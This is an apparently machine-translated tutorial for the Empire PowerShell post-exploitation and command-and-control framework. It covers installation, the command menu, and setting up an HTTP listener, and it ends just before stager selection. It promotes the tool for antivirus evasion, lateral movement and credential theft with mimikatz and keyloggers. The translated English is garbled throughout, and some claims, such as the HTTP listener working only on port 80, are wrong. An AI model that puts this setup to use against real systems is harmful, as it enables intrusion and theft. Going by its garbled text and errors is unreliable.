Empire - after penetration attacks framework PowerShell

About 0x01

Empire is a frame after penetration attacks. It is a pure PowerShell agents, secure communications with encryption and flexible architecture of additional features. Empire PowerShell method performed with the agent without the need of PowerShell.exe. It can quickly be modular late utilized, covering a wide range, from the keyboard to the recorder mimikatz like. This framework is a combination of PowerShell Empire and Python Empire projects; this makes it user-friendly and convenient. PowerShell Empire came out in 2015, Python Empire came out in 2016. It is similar to Metasploit and Meterpreter. But because it is a command and control tool that allows you to more effectively control the PC.

PowerShell provides a wealth of offensive advantage, including all further access, applock whitelist .NET as well as direct access to the Win32. It is also constructing a malicious binary file in memory. It provides C2 feature that allows you to implant the second phase after the first phase. It can also be used for transverse movement. Compared with other frameworks developed rapidly, and very convenient. In addition, because it does not require PowerShell.exe, which allows you to bypass anti-virus. Therefore, it is best to use PowerShell Empire.

0x02 function

listenter: listener is a listener process connection from our attacking machine. This helps Empire will loot back to the attacker's computer.

Stager: stager is a piece of code that allows us to run malicious code through a proxy on an infected host.

proxy: a proxy is a program that is used to maintain the connection between the computer and the infected host subject.

module: We perform malicious commands that you can collect to upgrade our credentials and permissions.

0x03 Installation

Use the following command to download it:

git clone https://github.com/EmpireProject/Empire.git

After the download is complete and complete, installed in accordance with the steps given below:

cd Empire/

cd setup/

./install.sh

After installation is complete, move back to the Empire directory and use ./empire run empire

Now using the help command, because it opens up all the basic options initially required.

(Empire) > help

Commands

========

agents Jump to the Agents menu. # Jump to Agent menu

creds Add / display credentials to / from the database. # Add / show credentials from the database

exit Exit Empire

help Displays the help menu.

interact Interact with a particular agent. # with a particular agent interaction

list Lists active agents or listeners. # List active agent or listener

listeners Interact with active listeners. # interactive session with the active

load Loads Empire modules from a non-standard folder. # clamp load module from the non-standard file Empire

plugin Load a plugin file to extend Empire. # load the plug-in files to extend the Empire

plugins List all available and active plugins. # lists all available plugins and activities

preobfuscate Preobfuscate PowerShell module_source files # pre confusion PowerShell module source file

reload Reload one (or all) Empire modules. # Empire reloading the one or more modules

report Produce report CSV and log files: sessions.csv, credentials.csv, master.log

# Generate CSV reports and log files

reset Reset a global option (eg IP whitelists). # a global reset option

resource Read and execute a list of Empire commands from a file. # read from the file and execute the command list Empire

searchmodule Search Empire module names / descriptions. # Empire search module name / description

set Set a global option (eg IP whitelists). # Set Global Options

show Show a global option (eg IP whitelists). # show global options

usemodule Use an Empire module. # module using a Empire

usestager Use an Empire stager. # Empire using a snippet

According to the workflow, first of all, we must create a listener on the local machine.

View active listeners listeners

Into the listener interface Enter the following command to view all the available listeners

(Empire: listeners) > uselistener <tab> <tab>

dbx http_com http_hop meterpreter redirector

http http_foreign http_mapi onedrive

The most popular and most commonly used is http listener

uselistener http

This command creates a listener on the local port 80. If port 80 is already occupied by services such as Apache, be sure to stop the service, because the listener is http listener can only work on port 80.

Review, listeners can use the command

(Empire: listeners) > <tab><tab>

agents delete enable info list resource

back disable exit kill listeners uselistener

creds edit help launcher main usestager

If you want to delete an active listener, use the kill command

(Empire: listeners) > kill http

[!] Killing listener 'http'

Now you should see all the options provided in this listener type:

info

As shown in the figure, you can use various settings to modify or customize the listener. We can try to change the name of our listeners, so that will help you remember all active listener;

set Name test

Name above command will change from http listener for the test.

Typically, this listener will automatically take up the local host IP, but just in case, you can use the following command to set the IP:

set Host 192.168.88.152

execute

The above command will execute listener. Then go back and listeners with PowerShell

Now enter 'back' to return to the interface from the listener, so that we can perform our module. Use the following command to view all the modules Empire provided:

(Empire: listeners/http) > back

(Empire: listeners) > usestager <tab> <tab>